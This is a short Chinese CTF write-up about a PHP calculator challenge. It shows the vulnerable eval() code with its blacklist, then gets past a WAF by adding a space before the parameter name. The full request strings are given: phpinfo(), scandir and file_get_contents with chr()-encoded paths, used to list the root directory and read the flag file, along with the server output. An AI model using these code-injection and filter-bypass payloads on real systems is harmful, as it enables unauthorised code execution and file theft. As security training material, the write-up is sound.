打开题目,查看源码,发现关键代码
<!--I've set up WAF to ensure security.-->
<script>
$('#calc').submit(function(){
$.ajax({
url:"calc.php?num="+encodeURIComponent($("#content").val()),
type:'GET',
success:function(data){
$("#result").html(`<div class="alert alert-success">
<strong>答案:</strong>${data}
</div>`);
},
error:function(){
alert("这啥?算不来!");
}
})
return false;
})
</script>
提示有WAF,但没有关于WAF的消息,尝试直接访问calc.php,得到源码
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>
尝试上传各种参数,发现无法上传字母,那么应该是WAF会检测num的值,那么这就要用到WAF和php不同的地方了。
php在解析URL等查询字符串的时候会去掉空格并将部分符号用下划线代替,测试发现在8.0.2nts版本依旧如此。
因此我们将"num"改为" num"
calc.php?%20num=phpinfo()
成功绕过WAF并得到关键信息
接下来就是查目录了,不能执行命令,那就用函数scandir,"/“被过滤了,那就用”chr(47)”
calc.php?%20num=var_dump(scandir(chr(47)))
回显
array(24) { [0]=> string(1) “.” [1]=> string(2) “…” [2]=> string(10) “.dockerenv” [3]=> string(3) “bin” [4]=> string(4) “boot” [5]=> string(3) “dev” [6]=> string(3) “etc” [7]=> string(5) “f1agg” [8]=> string(4) “home” [9]=> string(3) “lib” [10]=> string(5) “lib64” [11]=> string(5) “media” [12]=> string(3) “mnt” [13]=> string(3) “opt” [14]=> string(4) “proc” [15]=> string(4) “root” [16]=> string(3) “run” [17]=> string(4) “sbin” [18]=> string(3) “srv” [19]=> string(8) “start.sh” [20]=> string(3) “sys” [21]=> string(3) “tmp” [22]=> string(3) “usr” [23]=> string(3) “var” }
可以发现f1agg,看一下这是目录还是文件
calc.php?%20num=var_dump(is_dir(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
回显
bool(false)
那就是文件了,打开看看
calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
回显
string(43) "flag{88a3067d-23de-46b2-a22c-1f52dd5a8374} "